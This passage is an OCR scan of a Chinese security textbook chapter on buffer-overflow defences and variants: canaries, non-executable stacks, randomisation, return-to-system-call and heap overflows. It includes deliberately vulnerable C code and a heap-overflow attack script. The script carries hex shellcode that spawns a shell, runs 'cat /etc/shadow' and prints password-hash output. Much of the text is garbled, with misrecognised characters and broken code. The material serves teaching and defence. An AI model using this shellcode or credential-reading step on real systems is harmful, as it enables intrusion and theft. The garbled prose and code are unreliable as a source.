种 心态 : 编码 不 只 是 为 了 成 功 ， 或 者 为 了 预期 的 成 果 ; 要 经 常 意识 到 事情 可 能 已 经 误 人 层 途 ， 
编码 完全 错误 ， 当 不 希望 的 事情 发 生 时 总 能 明智 地 处 理 。 再 明确 地 说 ， 在 防止 缓冲 区 溢出 的 情 
况 下 ， 这 也 意味 着 程序 员 一 定 要 确保 写 到 缓冲 区 的 代码 首先 要 接受 检查 ， 以 保证 有 充足 的 有 效 
空间 可 以 使 用 。 在 本 章 前 面 的 例子 中 我 们 强调 了 使 用 库 例 程 的 问题 ， 例 如 使 用 库 例 程 gets), 
也 强调 了 对 字符 串 数据 的 输入 和 处 理 的 问题 。 当 然 并 不 限于 这 些 情 况 。 有 时 很 有 可 能 发 生 这 样 
的 情况 ， 编 写 显 而 易 见 的 代码 在 一 种 不 安全 的 方式 下 移动 一 些 值 。 图 10-10a 中 显示 一 个 不 安 
全 的 字 节 复制 函数 ， 这 段 代 码 从 数组 from 的 起 始 位 置 复制 len 个 字 节 到 数组 to 中 ， 从 数组 to 
的 第 pss 位 置 开 始 ， 最 后 返回 数组 to 复制 结束 的 位 置 。 不 幸 的 是 ， 这 个 图 数 对 目标 缓冲 区 to 
的 实际 长 度 没 有 给 出 任何 信息 ， 因 此 没有 人 能 保证 缓冲 区 溢出 不 会 发 生 。 在 这 种 情形 下 ， 调 用 
的 代码 应 该 保证 sizetlen 的 值 没 有 数组 to 的 长 度 大 。 这 也 说 明了 输入 值 不 一 定 必 须 是 一 个 字 
符 串 ， 它 可 以 仅 是 简单 的 二 进 制 数据 ， 正 如 误 操 作 那 样 。 图 10-10b 中 显示 一 个 不 安全 的 字 节 
输入 函数 ， 它 读 取 希望 的 二 进 制 数 据 的 长 度 ， 并且 接着 读 取 这 个 长 度 的 字 节 到 目标 缓冲 区 。 问 
题 还 是 在 代码 中 没有 给 出 目标 缓冲 区 长 度 的 任何 信息 ， 因 此 还 是 不 能 检查 是 否 可 能 出 现 缓冲 区 
溢出 。 这 些 例 证 既 强 调 了 需要 一 直 检 验 正 在 使 用 的 空间 大 小 ， 又 强调 了 使 用 简单 的 C 语言 代 
码 、 调 用 标准 库 例 程 能 够 发 生 缓冲 区 溢出 的 事实 。 使 用 C 语言 ， 它 的 数组 和 指针 的 符号 几乎 
是 相同 的 ， 但 是 在 使 用 上 又 有 轻微 的 差别 ， 这 就 引起 了 更 复杂 的 问题 。 特 别 地 ， 指 针 运 算 和 随 
后 的 解 引用 ( dereferencing， 即 找到 指针 所 指 回 的 内 容 ) 能 够 导致 访问 超出 已 经 分 配 的 变量 空 
间 ， 但 是 这 是 在 不 甚 明显 的 方式 之 下 。 在 编写 这 种 结构 的 代码 时 一 定 要 特别 细心 。 
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short read chunk(FILE. fil, char *to) | 
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short len; | Le 
fread(&len, 2, 1, fil); /* read length of binary data */ — = 


i _ fread(to, 1, len, fil); /* read len bytes of binary data |. 
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b) 不 安全 的 字 节 输入 
图 10-10 不 安全 的 C 语言 代码 实例 

语言 扩充 和 安全 库 的 使 用 在 C 语言 里 使 用 不 安全 的 数组 和 指针 引用 ， 就 会 发 生 问 题 。 
针对 这 些 问 题 人 们 给 出 了 很 多 增强 编译 需 功 能 的 建议 ， 即 在 这 些 引 用 中 上 自动 插入 范围 检查 。 对 
静态 分 配 的 数组 来 说 这 是 相当 容易 实现 的 ， 然 而 处 理 动 态 内 存 分 配 就 要 复杂 得 多 ， 因 为 在 编译 
时 长 度 信息 是 无 效 的 。 处 理 这 个 问题 需要 对 指针 的 语义 进行 扩充 ， 使 其 包含 边界 信息 及 库 例 程 
的 使 用 ， 确 保 这 些 值 被 正确 设置 。 在 [LHEE03] 里 列 出 了 几 种 这 样 的 方法 。 然 而 ， 使 用 这 些 技 
术 所 导致 的 性 能 损失 通常 不 太 容 易 被 接受 。 这 些 技术 也 要 求 对 需要 安全 特征 的 所 有 程序 和 库 使 
用 修改 的 编译 器 重新 编译 。 尽 管 对 操作 系统 的 新 版 本 和 相关 工具 来 说 这 是 可 行 的 ， 但 是 对 第 三 
方 的 应 用 程序 来 说 可 能 还 是 有 问题 的 。 
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KTF C 语言 的 一 个 共识 源 目 对 不 安全 的 标准 库 例 程 的 使 用 ， 特 别 是 一 些 字符 串 的 处 理 例 
程 。 改 进 系统 安全 性 的 一 个 方法 ， 是 用 较 安全 的 变 体 来 代替 这 些 不 安全 的 ， 其 中 包括 新 函数 的 
提供 ， 例 如 包括 OpenBSD 在 内 的 BSD 系列 的 操作 系统 中 的 strlicpy0 的 使 用 。 使 用 这 些 安全 的 
库 例 程 需 要 重新 编写 源 代码 使 其 符合 新 的 较 安 全 的 语义 ， 而 且 它 还 用 一 个 较 安全 的 变 体 来 代替 
标准 的 字符 串 库 。Libsafe 是 一 个 众所周知 的 这 样 的 典范 ， 它 实现 了 标准 的 语义 但 又 包含 了 附 
加 的 检查 ,保证 了 复制 操作 没有 超出 栈 帧 里 的 局 部 变量 的 有 效 地 址 空间 。 尽 管 它 不 能 防止 相 邻 
的 局 部 变量 受到 破坏 ， 但 却 能 防止 旧 的 栈 帧 和 返回 地 址 的 值 的 任何 修改 ， 从 而 就 能 防止 我 们 前 
面 讨论 的 典型 的 栈 缓冲 区 溢出 类 型 的 攻击 。 这 个 库 是 一 个 动态 库 ， 它 被 安排 在 现 有 的 标准 库 之 
前 被 装载 ， 从 而 不 需要 重新 编译 就 可 以 对 现 有 的 程序 提供 保护 ， 还 提供 对 标准 的 库 例 程 的 动态 
访问 (就 像 大 多 数 程序 一 样 )。 现 有 的 修改 过 的 库 代 码 已 经 至 少 像 标 准 库 一 样 有 效 ， 因 而 使 用 
它 可 以 很 容易 地 保护 现 有 的 程序 ， 避 免 一 些 形式 的 缓冲 区 溢出 攻击 。 

栈 保护 机 制 ” 一 个 保护 程序 避免 传统 的 栈 洲 出 攻击 的 有 效 方法 ， 是 设 定 函数 入 口 和 出 口 代 
码 并 检查 其 栈 幅 寻找 有 没有 受到 破坏 的 证 据 。 如 果 发 现 有 任何 修改 ， 程序 就 终止 运行 ， 不 允许 
攻击 继续 进行 。 下 面 我 们 讨论 提供 这 类 保护 的 几 种 方法 。 

REE (stackguard) 是 已 知 的 最 好 的 保护 机 制 之 一 ， 它 是 GCC 编译 帮 的 扩充 一 一 加 入 了 
附加 的 函数 入 口 和 出 口 代 码 。 添 加 的 函数 入口 代码 ， 在 为 局 部 变量 分 配 的 地 址 空间 之 前 ,在 旧 
的 帧 指针 地 址 之 下 写 和 一 个 canary 98 值 ; 在 继续 执行 这 些 背 用 果 数 的 退出 操作 (恢复 旧 的 帧 指 
针 和 转移 控制 权 后 退 到 返回 地 址 ) 之 前 ， 添 加 的 函数 出 口 代码 检查 canary 的 值 有 没有 变化 。 在 
一 个 典型 的 栈 缓冲 区 溢出 中 ,任何 为 了 改变 旧 的 帧 指针 和 返回 地 址 的 尝试 都 将 改变 这 个 值 ， 并 
将 会 被 检测 到 ， 从 而 导致 程序 异常 终止 。 为 了 对 盯 数 成 功 地 进行 保护 ，canary 的 值 应 该 是 不 可 
预测 的 ， 而 且 不 同系 统 上 canary 的 值 也 应 该 是 不 同 的 ， 这 一 点 非常 重要 。 如 果 不 是 这 样 ， 攻 
击 者 只 要 保证 shellcode 在 一 个 需要 的 存储 单元 包含 正确 的 canary 值 便 可 实施 攻击 。 通 常 在 进 
程 创建 时 选择 一 个 随机 值 作为 canary 值 ， 并 将 其 当 作 进程 状态 的 一 部 分 保存 起 来 。 接 着 ， 添 
加 到 函数 入 口 和 出 口 的 代码 就 使 用 这 个 值 。 

使 用 这 个 方法 还 有 一 些 问 题 ， 首 先 ， 所 有 需要 保护 的 程序 都 要 重新 编译 。 其 次 ， 因 为 栈 
帧 的 结构 已 经 改变 ， 这 会 使 程序 出 现 一 些 问 题 ， 可 用 调试 器 分 析 栈 帧 。 然 而 ，canary 技术 已 
经 用 于 重新 编译 整个 BSD 和 Linux 发 行 版 ， 并 为 其 提供 了 一 个 针对 栈 洲 出 攻击 的 高 级 对 抗 措 
施 。 通 过 使 用 微软 的 /GS Visual C++ 编译 器 选项 进行 编译 ， 类 似 的 功能 对 Windows 程序 也 是 
有 效 的 。 

Stackshield 和 返回 地 址 防护 者 ( Return Address Defender, RAD) 使 用 了 另外 一 种 栈 帧 保护 
机 制 。 这 些 也 是 GCC 的 扩展 版 ， 它 们 包含 附加 的 函数 入 口 和 出 口 代 码 。 这 些 扩展 没有 改变 栈 
帧 的 结构 。 而 是 ， 在 函数 入口 处 ， 添 加 的 代码 将 返回 地 址 的 一 个 副本 写 到 内 存 的 一 个 安全 区 域 
(要 想 破坏 这 个 区 域 非常 困难 ); 在 函数 的 出 口 处 ， 添 加 的 代码 检查 栈 帧 里 的 返回 地 址 与 保存 的 
副本 ， 如 果 发 现任 何 变化 就 终止 程序 。 因 为 栈 帧 的 格式 没有 改变 ， 故 这 些 扩展 与 未 改变 的 调试 
器 兼容 。 此 外 ， 程 序 必须 被 重新 编译 才 可 以 利用 这 些 扩展 。 


10.2.2 ”运行 时 防御 


就 像 我 们 已 经 注意 到 的 那样 ， 大 多 数 编译 时 (compile-time) 防御 方法 需要 对 现 有 的 程序 重 
新 编译 。 因 此 ， 人 们 有 了 对 运行 时 (run-time) 防御 的 兴趣 ， 像 操作 系统 通过 更 新 来 对 存在 漏洞 


O E (canary) 是 一 种 非常 敏感 的 岛 ， 因 此 矿工 们 将 这 种 鸟 放 在 矿井 里 用 于 探测 有 毒 空气 ， 提 醒 矿 工 及 时 
逃生 。canary 就 由 此 衍生 而 来 。 
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的 程序 提供 保护 一 样 ， 运 行 时 防御 也 能 这 样 配置 。 这 些 防御 方法 包括 改变 进程 的 虚拟 地 址 空间 
的 内 存 管理 或 者 改变 内 存 区 域 的 属性 ， 或 者 使 对 目标 缓冲 区 的 存储 单元 的 预测 变 得 更 加 困难 ， 
从 而 阻止 很 多 类 型 的 攻击 。 

可 执行 地 址 空间 保护 ”很 多 的 缓冲 区 溢出 攻击 ， 例 如 本 章 中 栈 溢出 攻击 的 实例 ， 都 涉及 复 
制 机 器 代码 到 目标 缓冲 区 并 转 而 执行 它 。 一 种 可 能 的 防御 是 在 栈 区 阻塞 代码 的 执行 ， 假 设 可 执 
行 的 代码 仅 能 在 进程 的 地 址 空间 找到 。 

为 了 有 效 地 文 持 这 个 特征 ， 需 要 支持 把 从 处 理 带 的 内 存 管理 单元 (MMU) 到 虚拟 内 存 的 
标签 (tag) 页 都 当 作 不 可 执行 的 (nonexecutable)。 一 些 处 理 器 ， 例 如 Solaris 使 用 的 SPARC, 
已 经 对 此 文 持 了 一 段 时 间 。 在 Solaris 里 使 用 时 需要 一 个 简单 的 内 核 参 数 的 变化 。 其 他 的 处 理 
ar, PN x86 家 族 ， 对 此 一 直 不 支持 ， 直 到 最 近 才 在 它 的 MMU 中 增加 了 一 个 相关 的 no-excute 
位 。Linux、BSD 及 其 他 UNIX 类 型 的 操作 系统 ， 也 进行 了 有 效 的 扩展 来 支持 这 个 特征 的 
使 用 。 一 些 系 统 确实 也 有 能 力 保 护 栈 及 扒 。 但 是 堆 也 是 攻击 的 目标 ， 我 们 将 在 10.3 节 中 对 
此 进行 讨论 。 在 最 近 的 Windows 系统 中 也 文 持 不 可 执行 (no-execute) 保护 。 

使 栈 (和 堆 ) 成 为 不 可 执行 的 ， 对 于 现 有 的 程序 可 以 提供 高 等 级 的 、 针 对 很 多 类 型 的 缓冲 
区 洪 出 攻击 的 保护 。 因 此 ， 在 很 多 最 近 发 行 的 操作 系统 标准 版 里 都 包含 了 这 个 扩展 。 然 而 ， 对 
程序 来 说 还 是 存在 一 个 问题 ， 那 就 是 要 将 可 执行 的 代码 设置 在 栈 中 。 这 是 能 够 发 生 的 ， 例 如 在 
Java Runtime 系统 使 用 的 即时 (just-in-time) 编译 器 里 ， 就 有 可 能 发 生 这 种 情况 。C 语言 中 ， 栈 
使 用 的 可 执行 代码 也 可 用 于 实现 函数 的 舱 套 (一 个 GCC 的 扩展 )， 以 及 用 于 Linux 的 符号 处 理 
机 制 。 支 持 这 些 需 求 需要 特别 的 规定 。 不 管 怎样 ， 它 被 认为 是 保护 现 有 的 程序 以 及 加 固 系 统 免 
受 攻击 的 最 好 的 方法 之 一 。 

地 址 空间 随机 化 ” 男 一 种 能 够 用 于 阻止 攻击 的 运行 时 防御 技术 是 对 进程 地 址 空间 中 的 关键 
数据 结构 的 存储 单元 的 处 理 。 特 别 地 ， 我 们 回忆 一 下 ， 为 了 实现 典型 的 栈 洲 出 攻击 ， 攻 击 者 需 
要 能 够 预测 目标 缓冲 区 大 致 的 位 置 ， 攻 击 者 使 用 这 个 预测 到 的 地 址 确定 一 个 合适 的 返回 地 址 以 
在 攻击 中 使 用 ， 在 此 将 控制 权 转 移 给 shellcode。 一 种 显著 增加 预测 难度 的 技术 是 ， 以 随机 的 方 
式 改 变 为 每 一 个 进程 的 栈 设 置 的 地 址 。 在 现代 的 处 理 右 上 ， 有 效 地 址 的 范围 是 巨大 的 ( 32 位 )， 
大 多 数 程序 仅仅 需要 其 中 很 少 的 一 部 分 。 所 以 ,大约 1 兆 字 节 的 栈 内 存 区 域 在 有 效 地 址 空间 中 
移动 ， 这 对 大 多 数 程序 只 有 很 小 的 冲击 ， 但 是 要 想 预 测 目 标 缓冲 区 的 地 址 几乎 是 不 可 能 的 。 这 
种 变化 与 大 多 数 存 在 漏洞 的 缓冲 区 的 大 小 相 比 大 多 了 。 因 此 ， 也 就 没 机 会 找到 一 个 足够 大 的 
NOP sled 处 理 这 个 范围 内 的 地 址 。 这 再 次 为 现 有 的 程序 提供 了 一 定 程度 的 保护 ， 当 它 不 能 停止 
攻击 行动 时 ， 程 序 由 于 一 次 无 效 的 内 存 引 用 也 能 异常 终止 。 如 果 攻 击 者 能 够 在 易 受 攻击 的 程序 
上 进行 大 量 攻 击 尝 试 ， 并 且 每 次 攻击 对 缓冲 区 位 置 有 不 同 的 猜测 ， 那 么 便 可 以 绕 过 此 防御 。 

与 这 种 方法 相关 的 问题 是 随机 动态 内 存 分 配 的 使 用 。 正 如 我 们 将 在 10.3 节 中 讨论 的 那样 ， 
会 有 一 类 堆 缓 冲 区 溢出 攻击 ， 它们 利用 这 样 一 个 事实 : 连续 内 存 分 配 或 者 堆 管 理 数 据 结构 的 排 
列 非常 接近 。 堆 内 存 分 配 的 随机 选择 使 预测 目标 缓冲 区 地 址 变 得 相当 困难 ， 从 而 可 以 成 功 阻止 
堆 汶 出 攻击 。 

攻击 的 另 一 个 目标 是 标准 库 例 程 的 存储 位 置 。 在 一 次 绕 过 保护 的 尝试 中 ， 例 如 绕 过 不 可 执 
行 的 栈 ， 一 些 缓冲 区 溢出 的 变种 攻击 在 标准 库 里 存在 的 代码 。 通 常 ， 这 些 代 码 在 相同 的 程序 里 
被 装载 到 相同 的 地 址 。 为 了 对 付 这 种 形式 的 攻击 ， 我 们 可 以 使 用 一 个 安全 扩展 ， 随 机 选择 一 个 
程序 装载 标准 库 的 次 序 ， 随 机 选择 它 的 虚拟 内 存 地 址 的 存储 位 置 。 这 样 就 可 以 使 任何 特定 函数 
的 地 址 变 得 不 可 预测 ， 从 而 减少 了 特定 攻击 正确 预测 地 址 的 机 会 。 

OpenBSD 系统 在 一 个 安全 系统 的 技术 文 持 中 包括 了 这 些 扩展 的 所 有 版 本 。 

guard 页 ”最 后 一 个 能 够 被 使 用 的 运行 时 防御 技术 是 在 进程 的 地 址 空间 的 关键 区 域 之 间 设 
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B guard 页 。 它 利用 了 这 样 一 个 事实 : 一 个 进程 的 有 效 虚 拟 内 存 比 它 通常 所 需要 的 要 多 很 多 。 
地 址 空间 的 每 一 部 分 所 使 用 的 一 系列 地 址 之 间 都 设置 有 间隔 (gap)， 就 像 图 10-4 所 描述 的 那 
样 。 这 些 间隔 ， 或 者 称 guard 页 ， 被 当 作 非法 地 址 在 MMU 里 做 了 标记 ,任何 访 问 它们 的 尝试 
都 将 导致 进程 终止 。 这 就 能 防止 缓冲 区 溢出 攻击 ,特别 是 全 局 数据 溢出 攻击 ， 因 为 它 企图 改写 
进程 的 地 址 空间 的 相 邻 区 域 ， 例 如 全 局 偶 移 量 表 ， 正 如 我 们 将 在 10.3 节 讨 论 的 。 

进一步 的 扩展 是 在 栈 帧 之 间 ， 或 者 是 在 堆 的 不 同 的 存储 区 域 之 间 设 置 guard 页 。 它 能 提供 
进一步 的 保护 ， 避 人 免 堆 和 栈 溢出 攻击 ,但 是 它 耗费 执行 时 间 ， 因 为 它 需 要 支持 数目 巨大 的 页 映 
射 需求 。 


10.3 ”其 他 形式 的 溢出 攻击 


这 一 节 ， 我 们 讨论 一 些 其 他 的 缓冲 区 溢出 攻击 ， 并 提供 可 能 的 防御 措施 。 这 些 攻击 包括 栈 
溢出 的 各 种 变种 ， 例 如 返回 导 回 的 系统 调用 、 保 存在 程序 堆 区 的 数据 溢出 ， 以 及 保存 在 进程 的 
全 局 数据 区 的 数据 溢出 。 关 于 这 些 攻击 的 更 详细 的 调查 分 析 ， 可 以 在 [LHEE03] 中 找到 。 


10.3.1 替换 栈 帧 


在 典型 的 缓冲 区 溢出 中 ,攻击 者 改写 了 设置 在 一 个 栈 帧 的 局 部 变量 区 域 的 缓冲 区 ， 并 改写 
保存 的 帧 指针 和 返回 地 址 。 这 种 攻击 方式 的 一 个 变种 就 是 改写 缓冲 区 以 及 保存 的 帧 指针 地 址 。 
保存 的 帧 指针 值 被 改变 为 被 改写 的 缓冲 区 顶部 附近 的 一 个 存储 单元 ， 在 这 个 位 置 用 一 个 指 癌 
shellcode 的 缓冲 区 较 低位 置 的 返回 地 址 创建 一 个 虚假 的 栈 帧 。 随 着 这 次 变化 ， 当 前 的 函数 正常 
返回 到 正在 调用 它 的 函数 ， 因 为 它 的 返回 地 址 没有 被 改变 。 然 而 ， 正 在 调用 的 函数 现在 使 用 蔡 
代 的 虚假 的 栈 帧 ， 当 它 返 回 时 ， 控 制 权 将 会 转移 到 被 改写 的 缓冲 区 里 的 shellcode。 

这 似乎 是 一 种 相当 间接 的 攻击 ， 但 它 可 以 在 系统 仅 允许 有 限 的 缓冲 区 溢出 发 生 时 使 用 ， 这 
种 情况 下 系统 允许 更 改 保存 的 帧 指针 但 不 允许 更 改 返 回 地 址 。 你 可 以 回顾 一 下 图 10-7 中 显示 
的 程序 示例 ， 它 仅仅 允许 用 附加 的 足够 的 缓冲 区 内 容 来 改写 帧 指针 ， 但 不 包括 返回 地 址 。 这 个 
示例 也 可 能 不 使 用 这 种 攻击 方式 ， 因 为 最 后 的 NULL 结束 了 读 和 缓冲 区 的 字符 串 ， 这 就 既 改 
变 了 保存 的 帧 指针 ， 又 改变 了 返回 地 址 ， 这 将 会 阻碍 攻击 。 然 而 ， 还 有 一 类 栈 溢出 攻击 称 为 差 
一 错误 ( off-by-one) 攻击 。 这 类 攻击 一 般 发 生 在 一 个 二 进 制 缓冲 区 复制 的 时 候 ， 此 时 程序 员 在 
程序 里 包含 一 些 代 码 用 于 检查 被 转移 的 字 节 数 ， 但 是 由 于 一 个 编码 错误 ， 人 允许 比 有 效 地 址 空间 
多 一 个 字 节 的 内 容 复 制 。 当 一 个 条 件 测试 使 用 一 代替 了 <， 或 者 使 用 >= 代替 了 > 时 都 会 发 
生 这 种 情况 。 如 果 在 保存 的 帧 指针 之 下 紧 挨 着 设置 了 缓冲 区 S， 接 下 来 这 个 多 出 的 字 节 就 能 够 
改变 这 个 地 址 的 首位 置 (x86 处 理 侨 上 最 小 的 有 意义 的 字 节 )。 尽 管 改变 一 个 字 节 好 像 问题 不 
大 ， 但 这 却 给 了 攻击 者 可 乘 之 机 ， 攻 击 者 想 要 在 当前 帧 的 范围 内 将 真实 的 旧 栈 帧 (就 在 内 存 当 
前 的 栈 帧 之 上 ) 的 地 址 ， 改 变 成 一 个 设置 在 缓冲 区 内 新 的 虚假 的 栈 帧 ， 这 个 变换 一 般 仅 需要 几 
十 个 字 节 。 如 果 和 幸运 地 使 用 了 正在 使 用 地 址 ， 那 么 一 个 字 节 (one-byte) 的 变化 就 足够 了 。 因 
此 ， 将 控制 权 转 移 给 shellcode 的 溢出 攻击 是 可 能 发 生 的 ， 即 使 是 非 直 接 的 。 

这 种 类 型 的 攻击 有 一 些 附加 的 限制 。 在 典型 的 栈 洲 出 攻击 中 ， 攻 击 者 仪 需 要 猜测 缓冲 区 大 
概 的 地 址 值 ， 因 为 偏差 可 以 通过 NOP sled 来 消除 。 然 而 要 想 间 接 进 行 攻击 ， 攻 击 者 必须 知道 
缓冲 区 精确 的 地 址 ， 正 如 当 改 写 旧 帧 指针 值 时 不 得 不 使 用 虚假 的 栈 帧 的 准确 地 址 那样 ， 这 将 能 
够 减少 攻击 者 攻击 成 功 的 机 会 。 攻 击 者 的 男 外 一 个 问题 出 现在 控制 权 已 经 返回 到 正在 调用 的 限 
数 之 后 。 因 为 函数 正在 使 用 虚假 的 栈 帧 ， 正 在 使 用 的 任何 局 部 变量 现在 都 无 效 ， 在 这 个 函数 执 


O 注意 本 章 的 例子 使 用 的 GCC 编译 髓 不 是 这 种 情况 ， 这 是 很 多 其 他 编译 器 的 一 个 通常 的 安排 。 
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行 完 成 并 返回 进入 shellcode ATEH EN], ARES ERY iin. SAI, WK Be Ss h 
来 说 这 是 一 个 冒险 行为 。 

防御 这 种 类 型 的 攻击 需要 有 任何 检测 函数 出 口 代 码 的 栈 帧 和 返回 地 址 变化 的 栈 保护 机 制 。 
而 且 ， 使 用 不 可 执行 的 栈 也 能 够 阻止 shellcode 的 运行 ， 尽 管 单独 使 用 它 不 能 阻止 我 们 将 要 在 
下 面 讨论 的 返回 导 问 的 系统 调用 攻击 的 一 个 非 直 接 的 变种 。 内 存 中 栈 的 随机 选择 和 系统 库 的 随 
机 选择 ， 都 将 最 大 限度 地 阻碍 攻击 者 猜测 到 使 用 的 正确 地 址 ， 因 而 成 功 阻 止 攻击 的 执行 。 


10.3.2 ”返回 到 系统 调用 


前 面 介 绍 的 不 可 执行 的 栈 (nonexecutable stack) 是 防御 缓冲 区 洲 出 的 ， 而 攻击 者 已 经 转 问 
男 一 种 不 同 的 攻击 一 一 改变 返回 地 址 ， 使 程序 跳 转 到 系统 上 现 有 的 代码 。 你 可 以 回想 一 下 ,我 
们 在 讨论 基本 的 栈 缓冲 区 溢出 攻击 时 ,已 经 注意 到 了 这 一 点 。 大 多 数 情况 下 攻击 者 将 选择 标准 
库 函 数 的 地 址 ， 例 如 函数 system()。 攻 击 者 详细 地 设 定 一 次 洲 出 : 填充 缓冲 区 ， 用 一 个 合适 的 
地 址 代替 保存 的 帧 指针 ， 用 希望 的 库 函 数 的 地 址 代替 返回 地 址 ， 写 入 一 个 占 位 符 (placeholder) 
的 值 ( 库 函 数 认为 这 是 一 个 返回 地 址 )， 接 下 来 写 入 传 给 库 函 数 的 参数 的 值 。 当 被 攻击 的 困 数 
返回 时 ， 它 恢复 (改变 的 ) 帧 指针 ， 然 后 出 栈 ， 并 将 控制 权 转 交 到 返回 地 址 ， 而 这 个 地 址 正 是 
引发 库 函 数 代码 开始 执行 的 地 址 。 因 为 该 阴 数 相信 它 已 经 被 调用 了 ， 它 把 栈 顶 部 的 当前 值 ( 占 
位 符 ) 当 作 一 个 返回 地 址 ， 并 使 用 上 面 的 参数 。 相 应 地 ， 它 将 在 这 个 位 置 的 下 面 建立 一 个 新 的 
栈 帧 并 且 运 行 。 

如 果 这 个 库 函 数 正 在 被 调用 ， 如 system ("shell command line")， 那 么 接 下 来 指定 的 shell 
命令 将 会 在 控制 权 返 回 到 被 攻击 的 程序 (由 于 攻击 很 可 能 骨 演 ) 之 前 被 运行 。 依 赖 于 参数 的 类 
型 以 及 库 函 数 对 它们 的 解释 ， 攻 击 者 需要 准确 知道 它们 的 地 址 (一 般 在 被 改写 的 缓冲 区 范围 
内 )。 在 这 个 例子 中 ， 尽 管 可 将 一 些 空格 置 于 "shell command line" 的 前 面 ， 但 这 些 空间 会 被 当 
作 空 白 空间 处 理 并 被 shell 忽略 ， 从 而 在 地 址 的 准确 猜测 上 人 允许 一 些 偶 差 。 

男 一 个 不 同 的 攻击 是 将 两 个 库 孔 数 调用 链接 在 一 起 ， 在 一 个 库 唤 数 之 后 调用 男 一 个 库 函 
数 。 链 接 是 通过 让 占 位 符 的 值 ( 当 作 第 一 个 被 调用 的 库 也 数 的 返回 地 址 对 等 ) 成 为 第 二 个 函数 
的 地 址 实现 的 。 接 下 来 ， 每 个 函数 的 参数 不 得 不 在 栈 内 的 合适 存储 单元 被 设置 ， 这 通常 限制 了 
哪个 函数 能 够 被 调用 ， 以 及 按照 什么 次 序 调用 。 一 般 是 将 第 一 个 地 址 设置 为 库 图 数 stropy() 的 
地 址 。 指 定 的 参数 允许 函数 从 被 攻击 的 缓冲 区 复制 一 些 shellcode 到 内 存 的 男 一 个 区 域 , 该 区 
域 没 有 被 标记 为 不 可 执行 的 。 第 二 个 地 址 指 回 shellcode 被 复制 到 的 目标 地 址 。 这 就 允许 一 个 
攻击 者 注入 他 们 自己 的 代码 ， 同 时 也 避 开 了 不 可 执行 的 栈 的 限制 。 

防御 缓冲 区 溢出 的 方法 还 包括 许多 栈 保 护 机 制 一 一 利用 函数 的 出 口 代码 检测 栈 帧 或 者 返回 
地 址 的 修改 情况 。 同 样 ， 内 存 中 栈 的 随机 选择 和 系统 库 的 随机 选择 ， 也 能 成 功 阻 止 这 些 攻击 的 
执行 。 

10.3.3” 堆 溢出 


随 着 人 们 对 栈 缓 冲 区 溢出 问题 认识 的 深入 ， 以 及 相应 的 防御 措施 的 开发 ， 攻 击 者 已 经 将 注 
意 力 转移 到 利用 进程 地 址 空间 中 的 缓冲 区 洪 出 实现 攻击 。 一 个 可 能 的 目标 是 从 堆 Cheap) 中 动 
态 分 配 的 内 存 缓冲 区 。 堆 一 般 设置 在 程序 代码 和 全 局 数据 之 上 ， 并 在 内 存 中 逐渐 向 上 分 配 (而 
栈 是 逐渐 向 下 分 配 )。 使 用 动态 数据 结构 的 程序 是 从 堆 中 请 求 内 存 的 ， 例 如 记录 的 链表 。 如 采 
这 样 一 条 记录 包含 一 个 缓冲 区 溢出 漏洞 ， 内 存 随 之 能 够 受到 破坏 的 威胁 。 与 栈 不 一 样 的 是 ， 堆 
空间 中 没有 容易 引发 控制 权 转移 的 返回 地 址 。 人 然而， 如 果 分 配 的 空间 包含 一 个 指向 函数 的 指 
针 ， 而 这 个 函数 代码 随后 就 要 被 调用 ,攻击 者 能 够 安排 改变 这 个 地 址 指向 被 改写 的 缓冲 区 的 
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shellcode。 通 常 ， 处 理 输入 / fh BC iS — 7 SRB UCT, ETERIK 
保存 大 块 的 数据 ， 这 时 上 述 攻击 可 能 发 生 。 也 可 以 保存 当前 的 数据 块 ， 那 么 这 条 记录 可 以 包含 
一 个 指 回 处 理 这 类 输入 〈 从 而 允许 通过 一 个 通用 的 曙 数 处 理 不 同 种 类 的 数据 块 ) 的 函数 指针 。 
这 样 的 代码 已 被 使 用 并 被 成 功 攻击 。 
作为 一 个 示例 ， 我 们 考虑 图 10-11a 所 示 的 程序 代码 。 它 声明 (declare) 了 一 个 包含 一 个 组 
冲 区 和 一 个 函数 指针 ”的 结构 体 。 我 们 讨论 在 主 例 程 main) 中 显示 的 代码 ， 它 使 用 标准 库 函 数 
malloc() 在 堆 中 为 结构 体 的 一 个 新 实例 (instance) 分 配 空间 ， 接 下 来 使 主 函 数 的 处 理 缓冲 区 的 
果 数 指针 指向 图 数 showlen()。 不 安全 库 例 程 gets() 的 使 用 再 一 次 显示 了 一 个 不 安全 缓冲 区 的 复 
制 。 随 后 ， 调 用 隐 数 指针 处 理 缓冲 区 。 
/* record type to allocate on heap */ 
typedef struct chunk { 
char inp[64]; /* wulnerable input buffer */ 
void {*process) (char *); /* pointer to function to process inp bat i 


} chunk t; 


void showlen(char *buf) 


int: len; I i 
len = strlen (buf); 
printf ("buffer5 read $d chars\n", len); 


main(int argc, char *argv[]) 
chunk_t *next; 


setbuf (stdin, NULL); 
next = malloc(sizeof (chunk_t) ); 
_next->process = showlen; 

. printf ("Enter value: "y; 
gets (next->inp) ; 
next->process (next->inp) ; 
printf ("buffer5 done\n") ; 





a) 存在 漏洞 的 堆 滋 出 C 语言 代码 


$ cat attack2 

#!/bin/sh 

# implement heap overflow against program buffer5 
perl -e ‘print pack ("H*", | 
-%90909090909090909090909090909090" . 
-—"9090eb1a5e31¢c08846078d1e895e08890" . 
"460cb00b89£38d4e088d560ccd80e8e1" , 
"ffffff2f62696e2f7368202020202020" . 
"b89704080a") ; 

print "whoami\n"; 


print "cat /etc/shadow\n";' 


-$ attack2 | buffer5 
Enter value: 
ia 


dames és 111453: 0: 99999: 7: 


nobody:*:11453:0:99999:7: :: 
knoppix: $1$p2wziIML$/yVHPQuwSkv1lUFJs3b9aj/ :13347:0:99999:7::: 





b) 堆 洲 出 攻击 示例 
图 10-11 堆 洲 出 攻击 示例 


O 实际 上 ， 这 样 一 个 结构 体 可 能 有 更 多 的 成 员 ， 包 括 标志 和 其 他 指向 该 结构 体 的 指针 ， 这 样 它 们 就 能 链接 在 
一 起 。 然 而 ， 我 们 这 里 讨论 的 基本 攻击 ， 由 于 改变 较 小 ， 因 此 还 能 继续 工作 。 


PIOF HP Rew 251 


已 经 确定 程序 中 包含 堆 溢出 漏洞 的 攻击 者 ， 他 将 会 建立 一 个 如 下 的 攻击 序列 ， 程序 运行 时 
我 们 检查 到 程序 地 址 设置 在 0x080497a8， 结 构 体 仅 包 含 64 个 字 节 的 缓冲 区 和 一 个 函数 指针 ; 
假设 攻击 者 使 用 我 们 早期 设计 的 如 图 10-8 所 示 的 shellcode， 攻 击 者 将 通过 在 前 面 扩 展 NOP 
